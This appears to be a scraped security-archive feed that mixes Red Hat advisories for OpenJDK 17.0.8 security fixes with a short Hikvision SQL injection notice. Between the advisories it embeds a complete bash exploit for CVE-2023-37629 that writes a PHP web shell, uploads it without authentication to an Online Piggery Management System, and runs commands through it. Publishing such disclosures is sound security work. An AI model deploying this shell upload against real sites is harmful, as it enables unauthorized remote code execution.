Red Hat Security Advisory 2023-4210-01 - The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. This release of the Red Hat build of OpenJDK 17 for portable Linux serves as a replacement for the Red Hat build of OpenJDK 17 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK 17.0.8 Security Update for Portable Linux Builds  
Advisory ID:       RHSA-2023:4210-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4210  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22044 CVE-2023-22045 CVE-2023-22049   
                   CVE-2023-25193   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and  
the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.8) for portable Linux  
serves as a replacement for the Red Hat build of OpenJDK 17 (17.0.7) and  
includes security and bug fixes, and enhancements. For further information,  
refer to the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: modulo operator array indexing issue (8304460) (CVE-2023-22044)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221642 - CVE-2023-22044 OpenJDK: modulo operator array indexing issue (8304460)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

5. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22044  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTH9AAoJENzjgjWX9erEF3MQAIz/QgaABP0KGHrWA91ow2pz  
hRAu1E5fTl6RH2slveKGbU+/V9JGLHGMNGh6h3kvYIrvmelwPcRBXf5k/Cb+IUF/  
hQTTHT4u4UKfBaRsA4TH5Axu0lbzKvVZ5XEHlkf9Cy6nwe+1GnEHlw7prX4508u/  
XT6mOQaflE0iMRJEpdJJbxkBS5ko+da4YSs7WN9AdMYiGGuzrZN24C4APykaKgqr  
TKpHSrxNn8Z70xk+7vtaZNm39vMml0wpY0ZSrVlxqZgdvC5u14t5ozSjp+ESsWtD  
EIUxsLXdAwVicdflYTgpmOExeplfSFKpndeVlIL1BGeFO/Eh5slym2/5KDYg1o6B  
A/h1SyAih6OQ3Onlv6uHB2RiabLWyYiJchH7jbS0zTNTYlpFXkhFIAOQEcL20mKM  
9aPhodjzcaHEn5n5zHHcYkna/wjpEm7ei1dIjM5ZDLd7bBA/Id1Bfp/DosPzB0Np  
mTCYvfw3tclZHh1f2CwkGQgBwTAXPF4HYRjfq1t6quHclcNcanK3aIneTEPOVv0T  
KSqKMJ3CUGA7jq8/ISr3DGsDc5IuKikq57uLH9dnvftQJ3yZzxcAmiUZJJYBVI4X  
nFccAET4KTP/jmUGq55JgQMEDqkrwlOJU1MGXuVCdUFMjoU6Bfs9OF5WNXCKIZmX  
ONIO6k8fJo9C09XVuBJC  
=2vpA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4210-01

Online Piggery Management System version 1.0 suffers from a remote shell upload vulnerability.

    #!/bin/bash# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability# Date: July 12 2023# Exploit Author: 1337kid# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html# Version: 1.0# Tested on: Ubuntu# CVE : CVE-2023-37629## chmod +x exploit.sh# ./exploit.sh web_url# ./exploit.sh http://127.0.0.1:8080/echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "echo "                         @1337kid"echo if [[ $1 == '' ]]; then    echo "No URL specified!"    exitfibase_url=$1unauth_file_upload() {    # CVE-2023-37629 - File upload vuln    echo "Generating shell.php"#===========cat > shell.php << EOF<?php system(\$_GET['cmd']); ?>EOF#===========    echo "done"    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')    if [[ $req == "200" ]]; then        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"    else        echo "Failed to upload a shell"    fi}req=$(curl -I -s $base_url | head -1 | awk '{print $2}')if [[ $req -eq "200" ]]; then    unauth_file_uploadelse    echo "Error"    echo "Status Code: $req"fi

Online Piggery Management System 1.0 Shell Upload

Red Hat Security Advisory 2023-4177-01 - The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-17-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:4177-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4177  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22044 CVE-2023-22045 CVE-2023-22049   
                   CVE-2023-25193   
=====================================================================

1. Summary:

An update for java-17-openjdk is now available for Red Hat Enterprise Linux  
9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-17-openjdk packages provide the OpenJDK 17 Java Runtime  
Environment and the OpenJDK 17 Java Software Development Kit.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: modulo operator array indexing issue (8304460) (CVE-2023-22044)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Installing the same java-17-openjdk-headless package on two different  
systems resulted in distinct classes.jsa files getting generated. This was  
because the CDS archive was being generated by a post script action of the  
java-17-openjdk-headless package. This prevented the use of the dynamic  
dump feature, as the checksum in the archive would be different on each  
system. This is resolved in this release by using the .jsa files generated  
during the initial build. (RHBZ#2221653)

* Prepare for the next quarterly OpenJDK upstream release (2023-07, 17.0.8)  
[rhel-9] (BZ#2222852)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221642 - CVE-2023-22044 OpenJDK: modulo operator array indexing issue (8304460)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2221653 - Base JDK CDS archive (classes.jsa) not unique per JDK build [rhel-9,openjdk-17] [rhel-9.2.0.z]  
2222852 - Prepare for the next quarterly OpenJDK upstream release (2023-07, 17.0.8) [rhel-9] [rhel-9.2.0.z]  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-17-openjdk-17.0.8.0.7-2.el9.src.rpm

aarch64:  
java-17-openjdk-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el9.aarch64.rpm

ppc64le:  
java-17-openjdk-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el9.ppc64le.rpm

s390x:  
java-17-openjdk-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el9.s390x.rpm

x86_64:  
java-17-openjdk-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-demo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-devel-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-headless-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-javadoc-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-javadoc-zip-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-jmods-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-src-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-static-libs-17.0.8.0.7-2.el9.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-demo-fastdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-devel-fastdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-fastdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-headless-fastdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-src-fastdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.8.0.7-2.el9.aarch64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el9.aarch64.rpm

ppc64le:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-demo-fastdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-fastdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-jmods-fastdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-src-fastdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.8.0.7-2.el9.ppc64le.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el9.ppc64le.rpm

s390x:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el9.s390x.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el9.s390x.rpm

x86_64:  
java-17-openjdk-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-debugsource-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-demo-fastdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-demo-slowdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-devel-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-devel-fastdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-devel-fastdebug-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-devel-slowdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-devel-slowdebug-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-fastdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-fastdebug-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-headless-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-headless-fastdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-headless-fastdebug-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-headless-slowdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-headless-slowdebug-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-jmods-fastdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-jmods-slowdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-slowdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-slowdebug-debuginfo-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-src-fastdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-src-slowdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-static-libs-fastdebug-17.0.8.0.7-2.el9.x86_64.rpm  
java-17-openjdk-static-libs-slowdebug-17.0.8.0.7-2.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22044  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTH8AAoJENzjgjWX9erE1RsP/1yQqL+kQHGI+pVClrMe7ADu  
WCVOroHWudvTGXRV0IpFab4V7AYofJV4CTcCs/cRYtJhaHdd+2jN9XIVvEd/ukYr  
zyyunMNsIbSLnSTNTZQ5cVwVOZNIzoqqTLDTjbZTCoe6UnI2+vkgSwEe6M0MWv8T  
IiG+pRSNtwHl8qbGz3/RxOnvcVP08R0M1uFaZFo7zwUn4qx+NcEz4h9Ak+87TBuC  
IzpDM84iEGvjQfJ1GM4jov7Vkv0NqH35BQCPf1QhhF98Bb3xe80awuyHEjfZLzan  
vLA5PocvKma/B7rHkelSkf8NNU2J6UIwVkslyZw6Y7l7irLnureELIyBYG+o2X0C  
QxFZSKhN66o8YjBFbcOcCJKkhUTkvbTwqPUwHD8CR1wv1KSYzviZXAymHBIV87d9  
LJF8xbNJgynPw8qy2Ub6MmXz0F22P/pLzgVGhzqef5zmbn4QSjCT3mgKyscr3i6z  
jqcDtFfYqCn0CW1nvpOFlGfaMEkZL4FuYzjkRBgURwujmTuoLR6VG2Kp3MmiSVEl  
H+iPB7q6tmHtQyFwKrtJRqZKWqj7q5317jBx8gi+fVnd06rEWfLXiWHnmXHOb2RB  
F4I7rZ/98Noagazzm4pqBAWytBrzNlkv8BCxukY88U+3eL0jTRoxmph8b2VtS3yc  
jmIq9zJ1RKmyBrBrRbb/  
=PeRC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4177-01

Red Hat Security Advisory 2023-4211-01 - The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit. This release of the Red Hat build of OpenJDK 17 for Windows serves as a replacement for the Red Hat build of OpenJDK 17 and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section. Issues addressed include denial of service and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenJDK 17.0.8 Security Update for Windows Builds  
Advisory ID:       RHSA-2023:4211-01  
Product:           OpenJDK  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4211  
Issue date:        2023-07-20  
CVE Names:         CVE-2023-22006 CVE-2023-22036 CVE-2023-22041   
                   CVE-2023-22044 CVE-2023-22045 CVE-2023-22049   
                   CVE-2023-25193   
=====================================================================

1. Summary:

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and  
the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.8) for Windows serves  
as a replacement for the Red Hat build of OpenJDK 17 (17.0.7) and includes  
security and bug fixes, and enhancements. For further information, refer to  
the release notes linked to in the References section.

Security Fix(es):

* OpenJDK: ZIP file parsing infinite loop (8302483) (CVE-2023-22036)

* OpenJDK: weakness in AES implementation (8308682) (CVE-2023-22041)

* OpenJDK: improper handling of slash characters in URI-to-path conversion  
(8305312) (CVE-2023-22049)

* harfbuzz: OpenJDK: O(n^2) growth via consecutive marks (CVE-2023-25193)

* OpenJDK: HTTP client insufficient file name validation (8302475)  
(CVE-2023-22006)

* OpenJDK: modulo operator array indexing issue (8304460) (CVE-2023-22044)

* OpenJDK: array indexing integer overflow issue (8304468) (CVE-2023-22045)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167254 - CVE-2023-25193 harfbuzz: OpenJDK: O(n^2) growth via consecutive marks  
2221619 - OpenJDK: font processing denial of service vulnerability (8301998)  
2221626 - CVE-2023-22006 OpenJDK: HTTP client insufficient file name validation (8302475)  
2221634 - CVE-2023-22036 OpenJDK: ZIP file parsing infinite loop (8302483)  
2221642 - CVE-2023-22044 OpenJDK: modulo operator array indexing issue (8304460)  
2221645 - CVE-2023-22045 OpenJDK: array indexing integer overflow issue (8304468)  
2221647 - CVE-2023-22049 OpenJDK: improper handling of slash characters in URI-to-path conversion (8305312)  
2223207 - CVE-2023-22041 OpenJDK: weakness in AES implementation (8308682)

5. References:

https://access.redhat.com/security/cve/CVE-2023-22006  
https://access.redhat.com/security/cve/CVE-2023-22036  
https://access.redhat.com/security/cve/CVE-2023-22041  
https://access.redhat.com/security/cve/CVE-2023-22044  
https://access.redhat.com/security/cve/CVE-2023-22045  
https://access.redhat.com/security/cve/CVE-2023-22049  
https://access.redhat.com/security/cve/CVE-2023-25193  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkuTH6AAoJENzjgjWX9erE4X4P/i5/rql5+gQUR0Q8hMR1jR7i  
oyQ3IqPXm4uCoPfmoiSwG1PSClZVXNvIn3q1Cw34mWGMyi1imvmLzVME4S6rPGFm  
00BaF3Ox/ZB7/e9PzXcdGp7bzKwhmBe9/CTPDFRFlb5pL/csYbyK7j5wfn+2z1et  
nv7ZxyzMIAgl7VKonNUDAwqfs0tsjcKd16esckctGN5jaBnfUvb7OO4IoO8qHZ2Q  
YLMzs+eGmH9LhR488iqhz/OspNWYpDG+rxs3loj/a9yml0sqvCzR7HSALRD40jdl  
xDuyq+aHccxB+NcufJRRt1z+5fE1AsTivtsCnln906hoOvUjSWIKBlgsU4eSoZS3  
ZEkBppfUdiF27TX6eP4ubVSR2R8r1GHjjWJqY9drb+NG2E9UlZO1Lchqn8OpaAYC  
7RNonxtWDFvgCiC0zy3BbpX9Usgya2ju1mtDV0JN8XtUVfImDjpXrizfWh0VX87Z  
8+xuJnOv6sx3HJkvuE2xCLksSgbUQKrWN+RZdf5GTT5PDzVCYmjc5puPEXjKVgv5  
aAyS8R0nMzWPi12YEuEdDeoRSa0xNWpPkkGDI00FzIdohMQGOprTUauVyGeUrZ4x  
qPnfMpubxAjhujXUhhY7Agx3lU4DE+0adE+y5v9WYIERH4bf8MxJtQcrZHzhztwj  
ZupA95pk0sl6OzsyD5GA  
=pb7k  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4211-01

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

